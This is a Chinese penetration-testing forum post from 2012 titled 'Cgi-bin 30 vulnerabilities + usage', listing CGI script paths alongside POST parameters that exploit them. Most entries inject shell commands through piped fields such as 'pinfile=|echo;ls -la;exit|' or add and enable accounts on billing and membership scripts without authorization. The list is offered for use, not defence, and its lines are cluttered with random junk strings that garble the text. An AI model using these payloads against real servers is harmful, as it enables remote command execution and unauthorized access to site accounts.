中国网络渗透测试联盟

标题: Cgi-bin 30个漏洞+使用方法 [打印本页]
作者: admin    时间: 2012-9-13 16:55
标题: Cgi-bin 30个漏洞+使用方法
==============================# Y- n9 Y! m$ R/ [( t' R

9 Y  S  b2 n( I# m/smspass.pl* }9 s2 ^7 J8 p. Q% t, B( D, Y
username=username&password=password7 ?4 n$ m0 y9 e+ b- a

# c2 W' ^; b$ a/ @/ M  D3 @/index.cgi. h* |5 \% o* ^3 W
wei=ren&gen=command. V& D0 f3 Y# d
5 x# L: Y( E, }& N* T, v2 w- O
/passmaster.cgi
! W8 J' i+ U# ~' g( sAction=Add&Username=Username&Password=Password7 a6 d6 c2 {3 A7 d, N3 d
! }3 q9 ~; U3 z; F; o. K" w$ T
/accountcreate.cgi8 @/ d5 v, \  l: D8 T& O
username=username&password=password&ref1=|echo;ls|: L( |0 m1 k! _, w
( E! v9 q& V% m& X8 v( U
/form.cgi3 i8 _) d' _, r" z, p+ {# t
name=xxxx&email=email&subject=xxxx&response=|echo;ls|) u  H3 M  s( V  x+ C

1 w% f7 X: B' {6 b" m( {/addusr.pl
( i5 J# d2 Y: x* H2 o/cgi-bin/EuroDebit/addusr.pl
+ g: ?" r& j; |/ |9 a4 ]+ uuser=username&pass=Password&confirm=Password. m8 [; J6 O, p, ~

; J) j1 G) l" F0 |. }1 s+ ^# e/ccbill-local.asp2 r9 P+ O* p' G" m1 D5 ~( G
post_values=username:password7 Z  c' g- C* {9 C/ ^8 V, F
+ \$ v/ b' |0 X" O
/count.cgi5 p9 K: R2 D2 ]
pinfile=|echo;ls -la;exit|+ |9 D% N' ]# _" g; r! G
# \  j. ]+ U" A# ~5 e; m3 c
/recon.cgi
9 }  z2 }. C* L) S2 Z/recon.cgi?search& h6 @. O1 [8 [; Z* ]' `
searchoption=1&searchfor=|echo;ls -al;exit|
# W* O3 e$ `9 c5 _; s; q  p
- `* Z7 b: }' A& y/verotelrum.pl
* ]0 |2 J6 H; j- A) u9 e. ~  s! X# Svercode=username:password:dseegsow:add:amount<&30>
+ x7 e& h  n% c2 u3 B7 S; T- Y. N" J, n" @# e, `
/af.cgi
5 M9 W5 K0 o4 @6 D& D_browser_out=|echo;ls -la;exit;|- o. q. @4 ]4 x4 Q

0 Y7 s3 X1 c9 o, G. W/modify.cgi
0 b5 }( d" K5 D5 _/ ~; kusername=username&password=password&expire=30
* O4 f3 k1 Q  V; Q! p
' d; S, L& B& C% G$ k/openjournal.cgi
; O' E& d, ]9 ~) R$ M8 gedit=1&ct=2&go=|echo;ls -al;exit|
- [1 v  M) ]4 F& X( J
9 F! w4 F+ e4 x2 D+ V! @) L( r/gx9passwd.cgi
4 O' `* W, t7 s( {5 rcmd=ADD&user=username&pass=password1 t( o4 X/ r1 r4 ]; g$ ~5 O

& w( ?' Y0 p( k5 r- P/probecontrol.cgi) e; Q  ]: v) K0 H
command=enable&username=username&password=password+ q. y) A. i# w' ~9 b" C
: i8 b/ Y% C% y" Y( V0 P% J5 j/ W' s
/recon.cgi4 d; N6 v2 f  t8 H$ J2 y" {" \2 b
searchoption=3&searchfor=echo;ls -la;exit; k) e9 c- d. t) J+ p
' o6 V) n3 q* K( a; |2 ?' I
/htadd.pl9 u0 d7 @/ F( Z3 x; [1 v& n  V* ^
configfile=|echo; ls -alt; exit; `8 H8 b! B2 V' m) _4 Y

$ O3 {' Y2 M7 Y) _$ i/gx9passwd.cgi( F. J  U2 a: f5 c
cmd=ADD&user=username&pass=password
4 k) f- k2 d. p
3 M4 Z6 ]1 w( d/ibill*.pl
7 Y# s5 U3 t9 t- c1 ?+ d6 S* Ereqtype=add&authpwd=authpwd&username=username&password=password
5 v3 J9 c  L3 a  k! d' C' d
5 `# U1 Q  _( q" o7 N* v" a- g/cpay.cgi7 q% V4 y: ?" L3 t7 T  [2 D
command=add_member&username=username(EMAIL)&password=password(DES)
- X: y1 A( t- y" Z5 k# C+ y
: q3 B# ~! Z1 n6 L5 Y/globill_ut.cgi+ N9 b: d; n+ f8 n. c: R; j
do=add&username=username&password=password&wpassword=password; d- p( Y( r8 O2 {

/ y6 G  x( [8 T/ P8 y/usercontrol.cgi! B6 ~7 ~0 c) `' @$ g5 B
command=enable&username=USER&password=PASS
4 ?. W  m; @" _4 D* r9 n
, F7 O( v# o  M( s/globoSALErum.cgi! U7 [/ c8 e" R. R3 L* h
action=ADD&seccode=seccode&login=username&password=password& }" T; H5 x! t
/ @1 j+ f. e. m( b
/addusr.pl8 x7 l( s( \7 H
user=USER&pass=PASS&confirm=PASS: X9 b3 B4 {8 u/ k9 x: w
! J6 D6 Z/ N" H$ i% W6 u3 R
/pincount.cgi. K0 N- B) F( _9 W& R
/cgi-bin/mastergate/pincount.cgi  X4 s& r& _1 Q0 g7 z
pinfile=|echo;pwd;exit|; w1 }3 o, r8 _+ O* s
8 O$ |1 d) w7 f7 ?& r
/accountcreate.cgi
$ o' V. R: A6 Q3 i/cgi-bin/gateway/accountcreate.cgi. R  a+ Y) C0 W9 j
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
1 m+ ^5 k7 m" c, m
5 e" T8 x+ M; k/ n; g/af.cgi- E+ ]7 `+ d* i
/env.cgi
8 p% s* w+ _3 b8 X, N& D6 MADD+;echo;pwd;exit0 q& Z7 s* M. y3 s3 p+ J! R

) m3 E; ?7 E3 J0 z8 B) D5 c; }# f1 N/count.cgi
' ?: l; q6 y1 p7 [# @pinfile=|echo;pwd;exit|& _0 J& k1 z$ i7 ^
1 J3 C4 f' J7 a
/recon.cgi
- a$ C& `( G, B1 N! Nsearchoption=1&searchfor=|echo;ls%20-al;exit|
( p/ }' i& h6 a9 Y1 }  U9 [, O8 e9 ]( E0 R9 N7 {. R) h& n
/add.cgi% @$ C4 N! w$ }+ g1 W5 `
username=username&password=password&expire=30
2 g3 W% Y* Q% n: C5 S
: ?, L! q# w: G) y7 E6 e. V==============================0 F5 L1 V! x; X# P' Z6 v: \" G




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2